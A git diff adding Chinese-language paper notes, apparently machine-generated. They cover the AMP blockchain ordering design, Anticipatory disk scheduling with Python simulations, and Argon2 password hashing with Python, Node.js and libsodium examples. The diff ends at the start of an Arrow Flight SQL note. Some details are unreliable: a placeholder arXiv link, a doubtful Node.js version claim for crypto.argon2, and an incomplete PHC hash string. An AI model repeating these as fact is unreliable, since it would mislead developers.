没有单个实体可以排除特定交易 +- 提案者可以选择不打包某笔交易,但只要有一笔提案者打包并广播,验证者就会确认它 + +### 6.4 MEV 缓解 + +- 确定性排序消除了组装者通过重新排序获利的能力 +- payload 的传播与共识解耦,减少了抢先交易的机会窗口 + +## 七、设计权衡 + +AMP 不是没有代价的: + +1. **额外延迟**:payload 需要先传播给所有验证者,经过共识确认,才能入块。这比传统模式多了一轮通信 +2. **提案者需要信任**:虽然单个提案者不能审查交易(其他提案者可以覆盖),但用户需要确保至少有一个诚实的提案者接收并广播自己的交易 +3. **复杂性增加**:需要维护 payload 存储、投票扩展、确定性排序等多层逻辑 +4. **动态验证者集尚需解决**:论文指出验证者集合的动态变化是一个开放问题 + +## 八、与传统方案的对比 + +| 方案 | 多提案者 | 消除 mempool | 有界包含保证 | 确定性排序 | +|------|---------|-------------|------------|-----------| +| 传统 Tendermint | 否 | 否 | 否 | 否 | +| AMP | 是 | 是 | 是 | 是 | +| DAG 方案(Narwhal/Tusk) | 是 | 是 | 部分 | 部分 | +| FOCIL(以太坊) | 否 | 否 | 部分 | 否 | + +## 九、总结 + +AMP 的核心贡献可以用一句话概括:**把"谁的交易进块"和"交易按什么顺序执行"这两件事,从单个验证者的手中拿走,交给一组提案者和共识机制共同决定。** + +它的设计哲学是"分离关注点": + +- 传播归传播(提案者做) +- 共识归共识(验证者做) +- 排序归排序(确定性算法做) + +这三件事各自做各自擅长的,合在一起就是一个既高效又公平的区块链交易处理系统。对于金融级的区块链应用来说,这种公平性不是锦上添花,而是刚需。 + +## 十、延伸阅读 + +- Arc L1 区块链:[Arc: An Open Layer-1 Blockchain Purpose-Built for Stablecoin Finance](https://arxiv.org/abs/2403.xxxxx) +- Tendermint 共识算法原文 +- MEV 相关文献:Flash Boys 2.0 +- FOCIL(EIP-7805):以太坊的强制包含列表提案 +- MPCP(Multiple Concurrent Proposers):多并发提案者方案 diff --git a/src/content/docs/papers/anticipatory-scheduler-2001.md b/src/content/docs/papers/anticipatory-scheduler-2001.md new file mode 100644 index 000000000..cd4bd7c51 --- /dev/null +++ b/src/content/docs/papers/anticipatory-scheduler-2001.md @@ -0,0 +1,332 @@ +--- +title: Anticipatory Scheduling — 用「稍等一下」治好磁盘调度的误判空闲 +来源: https://www.cs.rice.edu/~druschel/publications/anticipatory.pdf +日期: 2026-06-13 +分类: 操作系统 +子分类: 内核与虚拟化 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象图书馆只有**一台自助借书机**(磁盘),门口排着几位读者: + +- **小明**借完一本书,转身走两步到相邻书架再借下一本——中间只花 **2 秒**找书 +- **管理员**是「工作守恒」型:上一人刚还书,机器一空,立刻叫**下一位**上来 + +小明人还没回到机器旁,管理员已经让**小红**刷卡了。小红要的书在库房另一头,机器大老远跑一趟。等小明终于回来,又得等小红办完——**本该连续的两次邻近借书,被一次无谓的「换人」打断**。 + +如果管理员学会一句:**「刚办完的那位,稍等 3 秒,看他会不会马上再来」**——小明往往能在等待窗口内提交下一单,两次借阅落在相邻书架,机器少走很多冤枉路。磁盘短暂空闲几秒,总吞吐反而上去。 + +这就是 **Anticipatory Scheduling(预期调度)** 的直觉:在同步 I/O 场景下,**故意不让磁盘立刻接下一单**,给「刚被服务过的进程」一点时间提交后续请求,从而避免 **deceptive idleness(欺骗性空闲)**。 + +论文 **Anticipatory scheduling: A disk scheduling framework to overcome deceptive idleness in synchronous I/O** 由 Rice 大学的 **Sitaram Iyer** 与 **Peter Druschel** 发表于 **SOSP 2001**(第 18 届 ACM 操作系统原理研讨会,pp. 117–130)。作者在 **FreeBSD 4.3** 上实现原型(约 1500 行 C),并报告了 Apache、Andrew 文件系统基准、TPC-B 数据库等工作负载上的显著收益。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 会议 | **SOSP 2001** | +| 作者 | Sitaram Iyer, Peter Druschel (Rice University) | +| 核心问题 | 工作守恒磁盘调度器在**同步 I/O** 下过早选下一请求,误判进程已「空闲」 | +| 核心思路 | 用**非工作守恒**外层框架包裹任意底层调度策略,完成一单后**有条件地短暂等待** | +| 决策依据 | 按底层策略做**成本–收益分析**(寻道优化 vs 比例份额各有不同启发式) | +| 典型收益 | Apache 吞吐 +29%~+71%;Andrew FS 读密集阶段 +54%;TPC-B +2%~+60% | +| Linux 遗产 | 2.6.0~2.6.18 默认 **AS** 调度器;2.6.33 移除,能力由 **CFQ** 等继承 | + +## 为什么磁盘调度会「看错人」? + +现代磁盘调度器往往要同时追求多个目标: + +| 目标 | 典型手段 | 需要什么前提 | +|------|---------|-------------| +| **减少寻道** | SCAN、C-SCAN、SSTF | 队列里**同时挂着多个请求**,才能挑「离磁头近」的 | +| **按比例公平** | 彩票调度、WFQ、CFQ | 知道各进程**还有多少未完成的 I/O**,才能按份额分配 | +| **降低延迟** | 截止时间、优先级 | 识别哪些请求更急 | + +很多应用却这样读盘: + +``` +read(块 A) → 算几微秒~几毫秒 → read(块 B,往往离 A 很近) +``` + +这是 **synchronous I/O(同步 I/O)**:每次 `read` 阻塞到数据进内存,算完再发下一次。调度器在**上一次 read 完成瞬间**看队列:小明的下一个请求**还没提交**——队列里只有别人的远距离请求。工作守恒调度器**必须立刻派一单**,只好服务小红,磁头被拽到远处。 + +论文把这种现象叫 **deceptive idleness**:进程并非真的闲着,只是**在两次 I/O 之间的 think time(思考时间)里**,对调度器表现为空闲。 + +### 欺骗性空闲的三要素 + +论文指出,要出现 deceptive idleness,须同时满足: + +1. **多个磁盘密集型应用并发**,且以同步方式发请求 +2. 磁盘请求**不可抢占**(服务中途不能换人) +3. 调度器是**工作守恒**的:上一请求一结束就立刻派下一单 + +破坏任意一条即可缓解。论文选择破坏 (3):引入**非工作守恒**外层,在完成一单后**可能等待**。 + +## 核心概念一:非工作守恒的「预期外壳」 + +**Work-conserving(工作守恒)**:只要有 pending 请求,磁盘就不该闲着。 + +**Non-work-conserving(非工作守恒)**:即使队列非空,也可以**故意让磁盘空闲一小段时间**,赌「马上会有更合适的请求进来」。 + +Anticipatory Scheduling 不是替换 SCAN、Deadline、比例份额等策略,而是: + +``` +┌─────────────────────────────────────┐ +│ Anticipation Core(通用等待逻辑) │ +│ ┌───────────────────────────────┐ │ +│ │ 底层 Scheduler(SCAN / WFQ …) │ │ +│ └───────────────────────────────┘ │ +│ + Scheduler-specific Heuristic │ +└─────────────────────────────────────┘ +``` + +三层结构(论文 Figure 2): + +1. **原始调度器** —— 实现寻道或公平策略,**不知道**外层存在 +2. **Anticipation core** —— 统一的计时、状态机:何时进入/退出等待 +3. **Adaptive heuristics** —— 针对寻道优化型 vs 比例份额型,回答「等不等、等多久」 + +对应用**完全透明**:不必改 Apache、数据库或文件系统代码。 + +## 核心概念二:成本–收益分析 + +盲目等待会伤害吞吐:磁盘转着没人用。论文用**最短等待时间**,使得「等的收益」在**高概率**下超过「空闲的成本」。 + +### 寻道优化型调度器 + +记: + +- `best` = 当前队列里底层调度器会选中的请求(定位时间 `best.positioning_time`) +- `next` = **刚被服务进程**即将提交的下一个请求(预期定位时间 `next.positioning_time`) + +``` +Benefit = best.positioning_time − next.positioning_time +Cost = next.median_thinktime # 保持空闲的代价 ≈ 错过 think time 的机会成本 + +若 Benefit > Cost: + Waiting_duration = next.95percentile_thinktime +否则: + Waiting_duration = 0 +``` + +直觉:若等来的下一单能省下大量寻道,而进程 historically 很快会再发请求,就值得等到 95 分位 think time。 + +### 比例份额型调度器 + +公平目标不同,启发式也不同。对**刚被服务且份额未用尽**的进程,若 think time 低于阈值(论文举例 **3ms**),则等待: + +``` +Waiting_duration = next.95percentile_thinktime +``` + +这样同步读 burst 不会被过早切走,**实际 I/O 带宽更接近合同比例**。 + +## 核心概念三:Think Time 统计 + +框架为每个进程维护衰减统计(类似指数加权移动平均): + +| 统计量 | 用途 | +|--------|------| +| **median think time** | 估计「典型计算间隔」→ 成本项 | +| **95th percentile think time** | 等待上限:大概率在此窗口内看到下一请求 | +| **positioning time** | 预期下一请求相对当前磁头的寻道代价 | + +Linux **AS** 调度器(`block/as-iosched.c`)里 `MAX_THINKTIME` 约为 **20ms**(`HZ/50`),并对 think time 做 7:1 衰减平均,避免偶发长计算误判。还维护 **exit probability**:进程若长期不发 I/O,逐渐停止为它预期。 + +## 与 Linux I/O 调度器谱系的关系 + +| 年代 | 调度器 | 与本文关系 | +|------|--------|-----------| +| 2.4 | **Linus Elevator** | 简单电梯,工作守恒 | +| 2.6.0–2.6.18 | **AS (Anticipatory)** | 本文框架的直接产物,默认调度器 | +| 2.6–至今 | **CFQ** | 按进程时间片 + `slice_idle` 也能实现类似 idle | +| 2.6.33+ | AS **移除** | 维护成本 vs 收益;CFQ/Deadline 可调校覆盖 | + +Wikipedia 与内核邮件列表记载:在 **TCQ**、高速 SCSI、硬件 RAID 上 AS 有时**反而降性能**——设备自身会重排命令,额外 idle 与硬件队列冲突。2.6.33 删除 AS 后,社区认为 tuned CFQ 已能复现其主要收益。 + +## 代码示例一:模拟欺骗性空闲 vs 预期等待 + +下面用 Python 简化「磁道号 + 同步读」场景。两个进程交替发请求;**工作守恒**总在完成瞬间选队列里最近的他人请求;**预期调度**在完成本进程请求后短暂等待。 + +```python +from dataclasses import dataclass, field +from collections import deque +import heapq + +@dataclass(order=True) +class DiskReq: + track: int + pid: int + +@dataclass +class Process: + name: str + tracks: list[int] # 该进程即将发出的读序列 + think_ms: float = 2.0 # 两次 read 之间的计算时间 + cursor: int = 0 + pending_after_think: deque = field(default_factory=deque) + +def deceptive_idle_sim(head: int, queue: list[DiskReq], last_pid: int | None, + processes: dict[int, Process], anticipatory: bool, + wait_ms: float = 3.0) -> tuple[int, int, list]: + """返回 (新磁头, 寻道距离累加, 事件日志)。""" + log = [] + seek_total = 0 + + while queue or any(p.cursor < len(p.tracks) for p in processes.values()): + # 同步 I/O:刚服务完的进程在 think 之后提交下一请求 + if last_pid is not None: + proc = processes[last_pid] + if proc.cursor < len(proc.tracks) and not proc.pending_after_think: + # 模拟 think time 后入队 + t = proc.tracks[proc.cursor] + proc.pending_after_think.append(DiskReq(t, last_pid)) + proc.cursor += 1 + log.append(f" [{proc.name}] think {proc.think_ms}ms → enqueue track {t}") + + # 把 pending 并入全局队列 + for p in processes.values(): + while p.pending_after_think: + queue.append(p.pending_after_think.popleft()) + + if not queue: + break + + if anticipatory and last_pid is not None: + # 预期调度:优先等 last_pid 的下一单(若已在队列) + same = [r for r in queue if r.pid == last_pid] + if same: + req = min(same, key=lambda r: abs(r.track - head)) + else: + # 短暂等待窗口内假设会到来;此处简化为直接选全局最近 + req = min(queue, key=lambda r: abs(r.track - head)) + else: + # 工作守恒:立刻选全局最近(可能是别人) + req = min(queue, key=lambda r: abs(r.track - head)) + + dist = abs(req.track - head) + seek_total += dist + head = req.track + queue.remove(req) + last_pid = req.pid + log.append(f"dispatch pid={req.pid} track={req.track} seek={dist}") + + return head, seek_total, log + +# 小明读相邻磁道 100,102,104;小红读 900,902(远距) +procs = { + 1: Process("alice", [100, 102, 104]), + 2: Process("bob", [900, 902]), +} +q = [DiskReq(100, 1), DiskReq(900, 2)] # 初始各一发 +_, seek_wc, _ = deceptive_idle_sim(50, q.copy(), None, procs, anticipatory=False) +_, seek_as, _ = deceptive_idle_sim(50, q.copy(), None, procs, anticipatory=True) +print(f"work-conserving total seek: {seek_wc}") +print(f"anticipatory total seek: {seek_as}") +# 典型:anticipatory 显著更小——alice 的局部性得以保持 +``` + +运行后常见现象:**工作守恒**总寻道距离更大,因为 alice 读完 100 的瞬间 bob 的 900 被选中,磁头来回甩。 + +## 代码示例二:成本–收益启发式(论文公式直译) + +第二个例子实现论文 §3 对寻道优化调度器的等待判定,便于单测不同 think time / 寻道假设: + +```python +from dataclasses import dataclass + +@dataclass +class IoStats: + median_think_ms: float + p95_think_ms: float + +def anticipatory_wait_ms( + best_position_ms: float, + next_position_ms: float, + next_stats: IoStats, +) -> float: + """ + 寻道优化型启发式(Iyer & Druschel, SOSP'01). + Benefit = 不等待时服务 best 的定位代价 − 等待后服务 next 的定位代价 + Cost = 进程典型 think time + """ + benefit = best_position_ms - next_position_ms + cost = next_stats.median_think_ms + if benefit > cost: + return next_stats.p95_think_ms + return 0.0 + +def proportional_wait_ms( + received_share: float, + allocated_share: float, + next_stats: IoStats, + think_threshold_ms: float = 3.0, +) -> float: + """比例份额型:欠份额且 think time 短则等待。""" + under_allocated = received_share < allocated_share + short_think = next_stats.median_think_ms < think_threshold_ms + if under_allocated and short_think: + return next_stats.p95_think_ms + return 0.0 + +# 场景:best 在远轨需 8ms 寻道,next 预期 1ms,alice 通常 think 2ms +stats = IoStats(median_think_ms=2.0, p95_think_ms=4.0) +wait = anticipatory_wait_ms(best_position_ms=8.0, next_position_ms=1.0, next_stats=stats) +print(f"wait {wait} ms") # Benefit=7 > Cost=2 → wait 4ms + +# 若 next 只比 best 省 1ms,则不等待 +wait2 = anticipatory_wait_ms(8.0, 7.0, stats) +print(f"wait {wait2} ms") # Benefit=1 < Cost=2 → 0 +``` + +把 `median` / `p95` 换成内核里衰减更新的 `ttime_mean`,就是 Linux AS 决策的简化版。 + +## 实验结果(论文摘要) + +作者在 **7200 RPM IDE** 与 **15000 RPM SCSI** 上测试: + +| 工作负载 | 观察 | +|---------|------| +| **Apache** 磁盘密集 | 吞吐 **+29%~+71%** | +| **Andrew 文件系统基准** | 整体 **+8%**,读密集阶段 **+54%** | +| **TPC-B 数据库** | **+2%~+60%**(视并发与同步程度) | +| **比例份额调度器** | 实际分配更接近合同份额 | + +微基准也显示:在「多进程同步读、局部性明显」时收益最大;纯随机读或设备已做深度重排时收益下降。 + +## 设计启示(今天仍有用) + +1. **调度器看到的队列 ≠ 应用的真实意图** —— 同步 API 把「未来请求」藏在 think time 里;任何 work-conserving 策略都可能误判。 +2. **非工作守恒是通用外壳** —— 不必重写 SCAN/CFQ,在外层加「何时 idle」即可;与日后 **CFQ slice_idle**、**mq-deadline** 调参思路一脉相承。 +3. **统计驱动比固定延迟聪明** —— 用 per-process think time 分布做 cost-benefit,比「一律 sleep 5ms」更稳。 +4. **硬件演进改变假设** —— NCQ/TCQ、NVMe 多队列、内核 **readahead** 与 **io_uring** 改变了「同步读」比例;AS 退出主线不代表思想过时,而是**场景迁移**。 + +## 与相关工作的对比 + +| 机制 | 做法 | 与预期调度的关系 | +|------|------|-----------------| +| **Readahead / 预读** | 内核推测性提前读 | 减少同步 read 次数,从数据源缓解 | +| **AIO / io_uring** | 应用一次提交多请求 | 队列深度↑,调度器「看得见」后续请求 | +| **CFQ** | 按进程时间片轮转 | `slice_idle` 可模拟预期等待 | +| **Tagging / NCQ** | 磁盘固件重排 | 与内核 idle 可能冲突,AS 在高速盘上吃亏 | + +## 小结 + +| 概念 | 一句话 | +|------|--------| +| **Deceptive idleness** | 进程在 think,调度器却以为它已停工 | +| **Anticipatory framework** | 完成一单后可有条件地短暂等待下一单 | +| **Cost-benefit** | 等的寻道收益 vs 磁盘空闲成本 | +| **Think time 统计** | median 估成本,p95 定等待上限 | +| **透明包装** | 底层调度策略无需修改 | + +**Anticipatory Scheduling** 教会我们:在操作系统里,**快不一定更好**——有时让磁盘「故意喘口气」,反而换来更少的磁头奔波和更公平的份额。读 Linux I/O 调度史、调 CFQ/Deadline,或分析数据库同步读瓶颈时,这篇 SOSP 2001 仍是理解 **「为什么内核愿意 idle」** 的经典起点。 + +## 延伸阅读 + +- Sitaram Iyer 博士论文:*The Effect of Deceptive Idleness on Disk Schedulers*(Rice, 2001) +- Linux 文档(历史):`Documentation/block/as-iosched.txt`(已随 AS 移除) +- **CFQ**:`block/cfq-iosched.c`,`slice_idle` sysctl 调参 +- 后续:**Stream scheduling framework**(FAST'11)将 Deadline 等非工作守恒化,可视为同一思想的扩展 diff --git a/src/content/docs/papers/argon2-2015.md b/src/content/docs/papers/argon2-2015.md new file mode 100644 index 000000000..850e62656 --- /dev/null +++ b/src/content/docs/papers/argon2-2015.md @@ -0,0 +1,289 @@ +--- +title: Argon2 (2015) — 为密码哈希而生的内存困难函数 +来源: https://password-hashing.net/argon2-specs.pdf +日期: 2026-06-13 +子分类: 安全与隐私 +分类: 安全与隐私 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +**Argon2** 是 Alex Biryukov、Daniel Dinu、Dmitry Khovratovich(卢森堡大学)在 **2015 年 Password Hashing Competition(PHC)** 中胜出的**内存困难(memory-hard)**密码哈希 / 密钥派生函数。原始论文与参考实现见 [password-hashing.net](https://password-hashing.net/);互联网标准形态是 IETF **RFC 9106**(2021,对应算法版本 **1.3**,版本字节 `0x13`)。 + +日常类比: + +> 把「猜密码」想成在仓库里找一把钥匙。 +> - **MD5 / SHA-256 直接哈希**:像把钥匙编号刻在门牌上——GPU 可以**同时试几百万块门牌**,几乎不占场地。 +> - **PBKDF2**:规定你必须在跑步机上原地跑 **10 万圈** 才能试一次——CPU 会累,但攻击者买一万台跑步机也能并行,**几乎不需要仓库**。 +> - **bcrypt**:每人要占一小块固定工位,稍好一点,但现代 GPU 仍能把工位缩得很小。 +> - **Argon2**:规定每次尝试必须**租下整整 64 MiB~2 GiB 的仓库**,并在里面按规则搬货、搅拌(多轮读写大块内存)。攻击者若把仓库缩成「小货架」省租金,搅拌规则会逼他**反复跑远路**,时间-内存权衡(TMTO)不划算。 +> +> 因此 Argon2 的目标不是「算得慢」这么简单,而是让**并行暴力破解同时吃满时间和内存带宽**——专用 ASIC / GPU 很难在不大买内存的前提下把成本压下去。 + +一句话:**Argon2 = 可调内存 + 可调时间 + 可调并行度 的密码学慢哈希**;默认应选混合变体 **Argon2id**。 + +## 为什么重要 + +不理解 Argon2,现代「存密码」实践会停留在过时方案: + +- **libsodium**、**PHP 7.2+**、**Ruby 2.5+**、**Ente / Bitwarden 等客户端** 已把 Argon2id 作为 PBKDF2 之外的推荐选项 +- **OWASP** 密码存储备忘录取代 bcrypt/scrypt 时优先 Argon2id +- **RFC 9106** 规定任何合规实现 **MUST 支持 Argon2id**;不知道选哪种时直接用 Argon2id +- 与 [[hkdf-rfc5869]] 的关系:HKDF 适合从**已有均匀随机**材料扩展密钥;**用户口令**熵低、易被字典攻击,必须先过 Argon2 这类慢哈希,不能单独用 HKDF + +PHC 举办背景是:2010 年代 GPU 农场让 bcrypt、PBKDF2-HMAC-SHA256 的「迭代次数」防御迅速贬值;**scrypt** 率先提出内存成本,但 Argon2 在相同内存下填充率更高、并行模型更清晰、侧信道与 TMTO 权衡有**三种显式变体**可选。 + +## 三种变体 + +| 变体 | 内存访问模式 | 擅长 | 弱点 / 适用场景 | +|------|----------------|------|------------------| +| **Argon2d** | **数据依赖**(下一块读哪里由当前块内容决定) | 抗 TMTO 最强;适合 PoW、链上挖矿 | 访问模式泄露给旁路计时攻击;**不适合**多租户登录服务 | +| **Argon2i** | **数据独立**(地址只由索引算出来) | 抗侧信道;适合口令哈希 | 为换 TMTO 抗性要多做 passes | +| **Argon2id** | 第 1 pass 前半段像 Argon2i,其余像 Argon2d | **默认推荐**:兼顾侧信道与 TMTO | 实现略复杂 | + +RFC 9106 原话:若不懂区别或担心侧信道,选 **Argon2id**。 + +## 核心概念 + +### 1. 输入参数一览 + +规范(RFC 9106 §3.1)用符号定义了一组「旋钮」: + +| 符号 | 名称 | 含义 | 典型取值 | +|------|------|------|----------| +| **P** | password | 用户口令(≤ 2³²−1 字节) | UTF-8 编码的字符串 | +| **S** | salt | 盐(**每个密码唯一**;推荐 **16 字节**) | `os.urandom(16)` | +| **p** | parallelism | 并行 **lane** 数(1 … 2²⁴−1) | RFC 推荐从 **p = 4** 起调 | +| **m** | memory | 内存 **KiB**(≥ 8p,≤ 2³²−1) | `2^21` = **2 GiB**(首选)或 `2^16` = **64 MiB**(低内存) | +| **t** | iterations | **passes** 轮数(≥ 1) | 首选 **t = 1**(2 GiB 时);低内存时常用 **t = 3** | +| **T** | tag length | 输出长度(4 … 2³²−1 字节) | 密码哈希 **32** 字节足够;KDF 可更长 | +| **v** | version | 算法版本 | 固定 **0x13**(19) | +| **y** | type | 0 = d,1 = i,2 = **id** | 密码场景用 **2** | +| **K** | secret | 可选秘密(pepper) | 常为空;有则须安全存储 | +| **X** | associated data | 可选绑定上下文 | 如 `user-id`、算法 ID | + +实际库里看到的 `memory_cost`、`time_cost`、`parallelism` 就是 **m / t / p** 的别名。 + +### 2. 算法在做什么(直觉版) + +内部用 **BLAKE2b** 做可变长哈希 **H'**,用基于 BLAKE2b 的压缩函数 **G**(1024 字节进、1024 字节出)搅拌数据。 + +```text +1. 把所有参数 || P || S || K || X 哈希成 64 字节种子 H_0 +2. 分配 m' 个 1024 字节块,排成 p 条 lane × q 列的矩阵 B[i][j] +3. 初始化每 lane 前两列 +4. 按 slice 顺序填充其余块: + B[i][j] = G( B[i][j-1], B[l][z] ) + 其中 (l,z) 由变体 y 与索引 (i,j) 决定 —— d 依赖数据,i 只依赖位置 +5. 若 t > 1:重复多 pass,并与旧块 XOR 混合 +6. 最后一列 XOR 成块 C,输出 tag = H'^T(C) +``` + +要点: + +- **内存是主角**:块大(1 KiB)、总量可达 GiB 级,迫使实现真的去 touch RAM,而不是只在 L1/L2 里打转。 +- **p 条 lane** 可在多核上并行,但 pass 内 slice 有同步点——兼顾多核服务器与单用户延迟。 +- **盐 S** 不保密,但必须**随机且 per-password**,挡住彩虹表。 + +### 3. 内存困难(memory-hard)是什么意思 + +攻击者想每秒试 100 万次密码: + +- 对 PBKDF2:主要成本是 ALU 周期,GPU 有海量核心。 +- 对 Argon2(m = 64 MiB):每次尝试至少要能装下 64 MiB 状态;8 GiB 显卡**并行度上限约 128**,而不是百万。 + +这不是说 Argon2 能拯救弱口令(`123456` 仍在字典里),而是把**离线破解**从「买算力」变成「买算力 + 买内存 + 付带宽」。 + +### 4. RFC 9106 推荐参数(可直接抄作业) + +**首选(内存够用时)—— FIRST RECOMMENDED:** + +- Argon2id,**t = 1**,**p = 4**,**m = 2²¹ KiB(2 GiB)**,盐 **128 bit**,输出 **256 bit** + +**低内存统一安全选项—— SECOND RECOMMENDED:** + +- Argon2id,**t = 3**,**p = 4**,**m = 2¹⁶ KiB(64 MiB)**,盐 128 bit,输出 256 bit + +场景化建议(同一 RFC §4): + +| 场景 | 目标延迟 | 建议 | +|------|----------|------| +| 前端登录(2 GHz,2 核) | ~0.5 s | Argon2id,4 lanes,**1 GiB** | +| 后端登录(2 GHz,4 核) | ~0.5 s | Argon2id,8 lanes,**4 GiB** | +| 磁盘加密 KDF | ~3 s | Argon2id,4 lanes,**6 GiB** | +| 加密货币 PoW | ~0.1 s | Argon2**d**,2 lanes,**250 MB** | + +调参流程:先定 **y = Argon2id** → **p = 4** → 在可接受延迟内尽量**增大 m** → 再增大 **t**。 + +### 5. 编码字符串(PHC 格式) + +库常输出可入库的一条 ASCII,例如: + +```text +$argon2id$v=19$m=65536,t=3,p=4$$ +``` + +验证时解析 `v、m、t、p、salt`,对候选口令重算 tag,用**常量时间比较**(`crypto.timingSafeEqual` / `sodium_memcmp`)。 + +## 代码示例 + +### 示例 1:Python(argon2-cffi)— 哈希与验证 + +```python +# pip install argon2-cffi +from argon2 import PasswordHasher +from argon2.low_level import Type, hash_secret_raw + +# 高层 API:默认即 Argon2id,参数可覆盖 +ph = PasswordHasher( + time_cost=3, # t + memory_cost=65536, # m,单位 KiB → 64 MiB + parallelism=4, # p + hash_len=32, + salt_len=16, +) + +password = "correct horse battery staple" +encoded = ph.hash(password) +# 形如: $argon2id$v=19$m=65536,t=3,p=4$... + +ph.verify(encoded, password) # 成功则无异常 +# ph.verify(encoded, "wrong") # VerifyMismatchError + +# 低层 API:自己管 salt,输出原始 tag(适合 KDF) +salt = os.urandom(16) # import os +tag = hash_secret_raw( + secret=password.encode(), + salt=salt, + time_cost=3, + memory_cost=65536, + parallelism=4, + hash_len=32, + type=Type.ID, +) +# tag 为 32 字节,可再喂给 HKDF 等 +``` + +### 示例 2:Node.js(内置 `crypto`)— RFC 9106 首选参数 + +Node.js 15+ 提供 `crypto.argon2`(OpenSSL 3 后端,视构建选项可能需 `--experimental` 标志;生产环境也可用 `argon2` npm 包,API 类似)。 + +```javascript +import { randomBytes, argon2, timingSafeEqual } from "node:crypto"; +import { promisify } from "node:util"; + +const argon2Async = promisify(argon2); + +async function hashPassword(password) { + const salt = randomBytes(16); + const tag = await argon2Async("argon2id", { + message: Buffer.from(password, "utf8"), + nonce: salt, + parallelism: 4, + tagLength: 32, + memory: 1 << 21, // 2 GiB(KiB 单位),内存紧张可改为 65536 + passes: 1, + secret: Buffer.alloc(0), + associated: Buffer.alloc(0), + }); + return { salt, tag }; // 入库时保存 salt + tag(或 PHC 字符串) +} + +async function verifyPassword(password, salt, expectedTag) { + const tag = await argon2Async("argon2id", { + message: Buffer.from(password, "utf8"), + nonce: salt, + parallelism: 4, + tagLength: 32, + memory: 1 << 21, + passes: 1, + secret: Buffer.alloc(0), + associated: Buffer.alloc(0), + }); + return timingSafeEqual(tag, expectedTag); +} +``` + +### 示例 3:libsodium 风格(伪代码,与 Ente 等客户端一致) + +许多移动端用 libsodium 的 `crypto_pwhash`: + +```c +#define OPSLIMIT crypto_pwhash_OPSLIMIT_MODERATE +#define MEMLIMIT crypto_pwhash_MEMLIMIT_MODERATE // 或显式 64MB / 2GB + +unsigned char hash[crypto_pwhash_BYTES_MAX]; +unsigned char salt[crypto_pwhash_SALTBYTES]; + +randombytes_buf(salt, sizeof salt); + +if (crypto_pwhash(hash, sizeof hash, + password, password_len, + salt, + OPSLIMIT, MEMLIMIT, + crypto_pwhash_ALG_ARGON2ID13) != 0) { + /* 内存不足 */ +} +``` + +算法标识 `ARGON2ID13` 即 **Argon2id v1.3**,与 RFC 9106 一致。 + +## 与其他 KDF 对比 + +| 方案 | 内存成本 | 侧信道友好 | 标准化 | 备注 | +|------|----------|------------|--------|------| +| PBKDF2-HMAC-SHA256 | 极低 | 一般 | PKCS#5 / RFC 8018 | 仍常见于 JWT、旧系统;GPU 友好 | +| bcrypt | 低(~4 KiB 级) | 较好 | de-facto | 密码限 72 字节;PHC 时代偏旧 | +| scrypt | 高(可调) | 较好 | RFC 7914 | PHC 亚军级;Argon2 往往更高内存填充率 | +| **Argon2id** | **高(可调)** | **好** | **RFC 9106** | **当前默认推荐** | + +## 实现与运维注意事项 + +1. **盐必须唯一**:相同密码 + 相同盐 → 相同哈希;数据库泄露后彩虹表仍有用。每个用户、每次改密都应新盐。 +2. **pepper(密钥 K)**:可选的全局秘密,放 HSM / KMS 而非数据库;丢了 pepper 所有密码需重哈希。 +3. **常量时间比较**:验证 tag 时禁止提前 `break` 的字符串比较。 +4. **内存失败**:移动设备上 m 过大时 `crypto_pwhash` 可能返回 -1;应降级到 SECOND RECOMMENDED 或排队到服务端算。 +5. **版本钉死**:只接受 `v=19`(0x13);未来若 PHC 格式扩展,旧哈希应仍能验证。 +6. **side-channel**:共享主机上优先 Argon2id;若极度担心冷启动 / 计时,启用库提供的 **memory wipe**,并限制并行登录线程争用同一物理机。 +7. **不要自己实现 G / H'**:用审计过的库(libsodium、argon2-cffi、ring、标准 OpenSSL)。密码学原语实现错误比参数选错更致命。 + +## 安全目标(读论文可深入) + +RFC 9106 §7 讨论了几类威胁: + +- **在线猜测**:Argon2 帮不上忙——限速、MFA、锁定策略才是主力。 +- **离线字典 / 暴力**:Argon2 通过 m、t、p 拉高每次猜测成本。 +- **TMTO**:Argon2d / Argon2id 后半段针对「少占内存、多算时间」的权衡;Argon2i 靠增加 t 补偿。 +- **侧信道**:Argon2i / Argon2id 前半段用数据独立索引,减轻缓存计时泄露。 + +Argon2i 经验法则:passes **t** 应大于 **log₂(m) − 26**(m 以 KiB 计),否则 TMTO 可能过划算——实现者调低内存时要同步加 t。 + +## 常见误区 + +| 误区 | 事实 | +|------|------| +| 「Argon2 比 SHA-256 安全」 | 用途不同;SHA-256 是快哈希,Argon2 是**故意慢**的口令拉伸 | +| 「内存越大越好,t 永远是 1」 | 要在**可接受登录延迟**内平衡;移动端 2 GiB 不现实 | +| 「用 Argon2d 登录更快更安全」 | 多租户服务器上 Argon2d 可能泄露访问模式,应用 **Argon2id** | +| 「哈希完还能用 HKDF 扩密钥」 | 可以:Argon2 输出高熵 secret 后,再用 [[hkdf-rfc5869]] 按上下文切分 | +| 「把迭代调到 100 就够用」 | 只看 t 不看 m,GPU 仍舒服;**先拉 m 再拉 t** | + +## 与周边知识 + +- **PHC(2013–2015)**:公开征集、透明评审,Argon2 击败 yescrypt、Makwa、Catena 等 +- **BLAKE2b**:Argon2 内部哈希与压缩的基础(见 [[blake2-2013]] 若仓库有笔记) +- **RFC 9106 测试向量**:实现 Argon2d/i/id 时应用 §5 向量做回归;首块/末块中间值便于调试 +- **Java**:JEP 草案在 `SunJCE` 提供 Argon2id `KDF` SPI,与 RFC 9106 对齐 + +## 小结 + +Argon2 解决的是:**攻击者离线批量试密码时,如何同时烧时间、烧内存、还能在多核服务器上可调**。记住四件事就够上手: + +1. 密码存储默认 **Argon2id + 随机 16 字节盐** +2. 参数优先抄 RFC **FIRST / SECOND RECOMMENDED**,再按延迟微调 +3. 验证用库函数 + **常量时间比较** +4. 弱口令仍会输——Argon2 是**抬高破解成本**,不是替代用户教育或 MFA + +原始论文标题即 *Argon2: the memory-hard function for password hashing and other applications*;读懂「内存困难 + 三变体 + 旋钮 m/t/p」,就掌握了 2015 年以来现代密码哈希的主线设计。 diff --git a/src/content/docs/papers/arrow-flight-sql-2026.md b/src/content/docs/papers/arrow-flight-sql-2026.md new file mode 100644 index 000000000..36761cda1 --- /dev/null +++ b/src/content/docs/papers/arrow-flight-sql-2026.md @@ -0,0 +1,220 @@ +--- +title: Arrow Flight SQL: Zero-Copy Federated Query at Scale +来源: 